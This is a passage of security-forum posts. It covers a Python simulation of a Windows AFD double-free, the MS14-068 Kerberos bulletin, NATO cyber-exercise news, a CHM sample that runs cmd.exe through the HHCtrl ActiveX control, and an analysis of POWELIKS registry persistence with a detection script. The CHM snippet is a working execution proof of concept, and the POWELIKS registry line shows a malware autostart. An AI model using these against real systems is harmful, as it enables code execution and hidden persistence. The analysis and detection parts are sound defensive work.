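        self._next = 0x1000          # illustrative chunk addresses
        self.live = set()

    def alloc(self, size):
        chunk = self._next
        self._next += size
        self.live.add(chunk)
        return chunk

    def free(self, chunk):
        if chunk not in self.live:   # what BAD_POOL_CALLER 0x7 reports
            raise DoubleFree(hex(chunk))
        self.live.remove(chunk)


@dataclass
class TpElement:
    flag: int = 0                    # post's TpElement +0x00
    length: int = 0                  # +0x04
    vaddr: int = 0                   # +0x08
    mdl: Optional[int] = None        # +0x0C, simulated MDL chunk id


@dataclass
class TpInfo:
    # post's pElemArray (+0x20) and elemCount (+0x28)
    elems: list = field(default_factory=lambda: [TpElement() for _ in range(3)])
    elem_count: int = 0


def transmit_file_fail(pool, tp):
    """Mimics AfdTransmitFile up to the MmProbeAndLockPages failure: one
    element gets an MDL, then the exception path runs with the count set."""
    # bit 1 clear and sign bit set: passes both checks in the reversed loop
    tp.elems[0].flag = -0x80000000
    tp.elems[0].mdl = pool.alloc(0xA0)
    tp.elem_count = 1


def _owns_mdl(e):
    return (e.flag & 0x02) == 0 and e.flag < 0 and e.mdl is not None


def return_tp_info_vulnerable(pool, tp):
    """Cleanup as reversed in the post: frees each MDL but leaves the
    pointers and elem_count in place, so the object carries stale state."""
    for i in range(tp.elem_count):
        e = tp.elems[i]
        if _owns_mdl(e):
            pool.free(e.mdl)         # dangling reference stays behind


def return_tp_info_fixed(pool, tp):
    """Same cleanup, but every freed reference is cleared and the count
    reset, so a second call on the recycled TpInfo is a no-op."""
    for i in range(tp.elem_count):
        e = tp.elems[i]
        if _owns_mdl(e):
            pool.free(e.mdl)
            e.mdl = None
            e.flag = 0
    tp.elem_count = 0


def run_twice(cleanup):
    """Allocate, fail, clean up, then reuse the same TpInfo (as the lookaside
    list hands it back) and clean up again. Returns 'double-free' or 'ok'."""
    pool = Pool()
    tp = TpInfo()
    transmit_file_fail(pool, tp)
    cleanup(pool, tp)                # first DeviceIoControl's exception path
    try:
        cleanup(pool, tp)            # second call on the recycled structure
    except DoubleFree:
        return "double-free"
    return "ok"


if __name__ == "__main__":
    print("vulnerable:", run_twice(return_tp_info_vulnerable))
    print("fixed:     ", run_twice(return_tp_info_fixed))
```

run_twice(return_tp_info_vulnerable) reports the double free on the second call, while run_twice(return_tp_info_fixed) returns "ok": once a structure can be recycled through a lookaside list, its release routine must leave it in the same state the initializer would, which is the property the reversed code lacks.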
-
Welcome to the free malware analysis webservice by Payload-Security.com. You can submit files for analysis using the form below. All submitted files will be analyzed using our innovative Hybrid Analysis technology. Link: Payload Security - VxStream Sandbox Public Beta - Malware Analysis
-
Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) Published: November 18, 2014 Version: 1.0 Executive Summary This security update resolves a privately reported vulnerability in Microsoft Windows Kerberos KDC that could allow an attacker to elevate unprivileged domain user account privileges to those of the domain administrator account. An attacker could use these elevated privileges to compromise any computer in the domain, including domain controllers. An attacker must have valid domain credentials to exploit this vulnerability. The affected component is available remotely to users who have standard user accounts with domain credentials; this is not the case for users with local account credentials only. When this security bulletin was issued, Microsoft was aware of limited, targeted attacks that attempt to exploit this vulnerability. This security update is rated Critical for all supported editions of Windows Server 2003, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, and Windows Server 2012 R2. The update is also being provided on a defense-in-depth basis for all supported editions of Windows Vista, Windows 7, Windows 8, and Windows 8.1. For more information, see the Affected Software section. The security update addresses the vulnerability by correcting signature verification behavior in Windows implementations of Kerberos. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability. For more information about this update, see Microsoft Knowledge Base Article 3011780. Sursa: https://technet.microsoft.com/library/security/MS14-068
-
400 Hackers Are Defending NATO in a Massive Cyberwar Game

November 18, 2014 // 05:52 PM EST

These days—in the wake of persistent attacks from hostile actors—NATO is taking cyber war very seriously. It’s part of the reason why it’s beginning its largest cyber attack exercise ever today, to better prepare member nations for the modern digital battlefield. “This exercise will test our systems to make sure that NATO keeps pace with that evolving threat,” said Ambassador Sorin Ducaru, NATO Assistant Secretary General for Emerging Security Challenges. Over 400 personnel from across alliance nations will be participating in the exercise from the comfort of their home countries, though the drills will aim at combating threats as an organized bloc. In the last year alone, hackers from suspected enemy states have stolen sensitive intelligence from NATO networks, or in the case of Chinese spies in July—valuable Canadian scientific research and development—from right under the noses of intelligence agencies. According to Ducaru, the “cyber threat” isn’t simply one-off attacks, either. Instead, hackers exploiting NATO systems is a “daily reality,” requiring persistent international coordination to combat the threat. For NATO, the exercises are all about improving efforts and communication among member nations, “against a series of targeted cyber incidents involving a NATO mission network.” As in, when NATO is attacked, it sets off alarm bells for the alliance to properly engage potential attackers. And there’s no mistaking how seriously NATO sees new digital enemies. In the words of the most powerful military collective in the world, cyber attacks are potentially “as harmful to modern societies as a conventional attack.” But attacks on NATO infrastructure are nothing new.
During tensions over Crimea in March, NATO websites and social media accounts were attacked by pro-Russian hackers. Then again in October, with hostilities still simmering with the Vladimir Putin regime, NATO computers were exploited by Russian hackers who went on to access networks in the White House. In a proactive move, NATO looks to be interested in upgrading its computer technologies, potentially in an effort to modernize its systems to be more secure. In two separate requests for contracts in the US and Canada, NATO is asking for expertise in an effort for “Modernization and Rationalization of the NATO Technology Infrastructure.” The plan is for 44 sites to be upgraded into cloud-based technologies over the next few years, with private consultants providing key expertise. The latest NATO exercises come on the heels of real world military exercises in Ukraine in September, along with ongoing deployments of NATO troops in Poland. All those efforts are largely seen as acts of solidarity with regional powers opposing Russia. Ultimately, with a growing list of enemy actors exploiting NATO networks, it really is high time the western military alliance sharpen its cyber defense skills before another intelligence loss, or worse. Sursa: http://motherboard.vice.com/read/nato-is-sharpening-its-cyber-war-defenses
-
Those who "hacked" the IGPR website have been caught
Nytro replied to D--ABLO's topic in Stiri securitate
What a bunch of losers. Stupid kids. -
Run calc.exe from chm: SAMPLE
Nytro replied to Nytro's topic in Reverse engineering & exploit development
In the file name: "infected". It works. And it works like this:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/c calc ,">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
That classid identifies the HHCtrl Object, an ActiveX control called IE HTML Help Control. -
POWELIKS Levels Up With New Autostart Mechanism

by Roddell Santos (Threats Analyst)

Last August, we wrote about POWELIKS’s malware routines, which are known for hiding its malicious code in a registry entry as part of its evasion tactics. In the newer samples we spotted, the malware, detected as TROJ_POWELIKS.B, employs a new autostart mechanism and removes users’ privileges to view the registry key’s content. As a result, users won’t suspect that their systems are already infected by the POWELIKS malware. This autostart technique is fairly new to the threat landscape and is not currently covered by Autoruns for Windows, the Windows utility that shows all files and registry entries that will execute upon Windows startup. When executed, POWELIKS creates the following registry entry:
[HKEY_CURRENT_USER\Software\Classes\clsid\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32]
(Default)="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";eval……."
a="#@~^XHoAAA=……"
Normally, users will see the following via the registry editor:
Figure 1: The created key of Poweliks
Based on the above screenshot, it would seem that the malware isn’t present in the registry. However, the content of the POWELIKS malware is actually hidden: it successfully hides its code by removing the user’s permission on that specific registry key.
Figure 2: User’s permission profile

Best Practices: How to add permissions

Users can navigate their way around this malware technique and view the registry content by adding the user name or group to the registry key’s permission section.
This can be done via the following steps:
1. Open Registry Editor
2. Go to the registry key HKCU\Software\Classes\clsid
3. On the left panel, right click {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
4. Highlight the user name
5. In the “Allow” section, select “Full Control” and “Read” (see Figure 3)
6. Click “OK” to save changes
7. Close Registry Editor, then open it again to reflect the changes
Figure 3: Updated user’s permission profile
Once done, the malware will be visible as shown below:
Figure 4. The visible malware code
When the malware creates an entry in HKCU\SOFTWARE\Classes\CLSID, Windows reflects this entry in HKCR\CLSID as shown below.
Figure 5. The updated HKCR\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} key

Why this CLSID?

CLSID is not a known autostart entry. So why did cybercriminals opt to use this registry key and not the typical autostart entries? This CLSID is for Windows’ thumbnail cache, which Windows calls whenever a thumbnail for any file is needed, for images, audio, etc. As such, when this CLSID is called, it executes the entry in HKCR\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} to show the thumbnail of the file, and with it the entry of POWELIKS in this key. This in turn loads POWELIKS every time, as seen in the screenshot below:
Figure 6: POWELIKS uses dllhost.exe to load itself on the system. Each dllhost.exe indicates a running POWELIKS.

Best Practices: Manual Removal

While this threat is continuously evolving, as seen in the new evasion tactic, it can be manually removed from systems via the following steps:
1. Download and execute Microsoft’s Process Explorer
2. Restart in Safe Mode.
3. Select the latest dllhost.exe mother process (see Figure 7)
Figure 7: Terminating the dllhost process
4. Right click and select “Kill Process Tree”
5. Open Registry Editor (Run > regedit.exe)
6. In the left panel, go to HKCU\SOFTWARE\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
7. Add permissions for the user (see the instructions on adding permissions)
8. In the right panel, delete the registry values “Default” and “a”. The whole CLSID cannot be deleted because of the presence of the blank key. If this is successful, the registry should look like this:
Figure 8: Clean registry entries
In the event that these values are recreated, it just means that POWELIKS is still running. Repeat step 3 to ensure that no dllhost.exe is still running.
9. Close Registry Editor

Conclusion

The POWELIKS malware poses serious risks, as its routines prevent it from being detected and removed from systems. In addition, one of its payloads is click fraud. To check whether your systems are infected by this threat, perform the suggested removal actions on your systems. We also recommend that users install security software that can detect such malicious files. Trend Micro protects users from this threat via the Trend Micro Smart Protection Network, which detects the said malware. The following is the related hash for this threat:
F2E179CB7307DF6190A783D5B72F1905C6F3BA3B – TROJ_POWELIKS.B
With additional analysis from Ohlord Gagto
Sursa: POWELIKS Levels Up With New Autostart Mechanism
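A defender's check for the persistence mechanism described above, written as an added example (not code from the Trend Micro post): it parses the text that `reg export` produces for HKCU\Software\Classes\CLSID and reports the indicators the post names. The sample .reg text is constructed for the demonstration, with PLACEHOLDER standing in for the encoded script the post elides, and the second key is benign filler. It goes slightly beyond the single CLSID: any LocalServer32/InprocServer32 default value that runs rundll32.exe with a javascript: argument is flagged, as is any value beginning with the Windows Script Encoder header #@~^, since the hidden value `a` in the post starts with that header.

```python
"""Scan a .reg export for the POWELIKS CLSID persistence described in the post.

Added example, not the post's code. Input is `reg export` text; the sample
below is constructed, with PLACEHOLDER where the encoded payload would be.
"""
import re

POWELIKS_CLSID = "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"   # CLSID from the post
HKCU_CLSID = "hkey_current_user\\software\\classes\\clsid\\"

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32]
@="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";eval(PLACEHOLDER)"
"a"="#@~^XHoAAA==PLACEHOLDER"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InprocServer32]
@="C:\\Program Files\\Example\\benign.dll"
"ThreadingModel"="Apartment"
'''


def parse_reg_export(text):
    """Return {key_path: {value_name: data}} from .reg export text.
    Handles the default value (@), quoted value names, string escapes and
    the trailing-backslash continuation lines used for long hex data."""
    keys, current, i = {}, None, 0
    lines = text.splitlines()
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line or line.startswith(";"):
            continue
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name, data = m.group(1), m.group(2)
            while data.endswith("\\") and i < len(lines):      # continuation
                data = data[:-1] + lines[i].strip()
                i += 1
            if name != "@":
                name = name[1:-1]
            if len(data) >= 2 and data[0] == data[-1] == '"':
                data = re.sub(r"\\(.)", r"\1", data[1:-1])     # unescape \" and \\
            keys[current][name] = data
    return keys


def find_poweliks_indicators(keys):
    """Return (key, reason) pairs for the indicators the post describes."""
    findings = []
    for key, values in keys.items():
        low = key.lower()
        leaf = low.rsplit("\\", 1)[-1]
        # a per-user copy of the thumbnail-cache CLSID overrides the system one
        if low.startswith(HKCU_CLSID) and leaf == POWELIKS_CLSID.lower():
            findings.append((key, "per-user override of the thumbnail-cache CLSID (COM hijack)"))
        if leaf in ("localserver32", "inprocserver32"):
            default = values.get("@", "")
            if re.search(r"rundll32(\.exe)?\s+javascript:", default, re.I):
                findings.append((key, "server default value runs rundll32.exe with javascript:"))
        for name, data in values.items():
            if data.startswith("#@~^"):      # Windows Script Encoder header
                findings.append((key, f'value "{name}" holds a Script Encoder blob'))
    return findings


def scan_reg_text(text):
    return find_poweliks_indicators(parse_reg_export(text))


if __name__ == "__main__":
    for key, reason in scan_reg_text(SAMPLE_REG):
        print(f"[!] {key}\n    {reason}")
```

On a live system this check needs one more rule the export cannot express: `reg export` silently skips a key the current user is not allowed to read, and the post shows that POWELIKS strips exactly those permissions, so a CLSID key under HKCU\Software\Classes that exists but returns access denied should itself be reported as a finding.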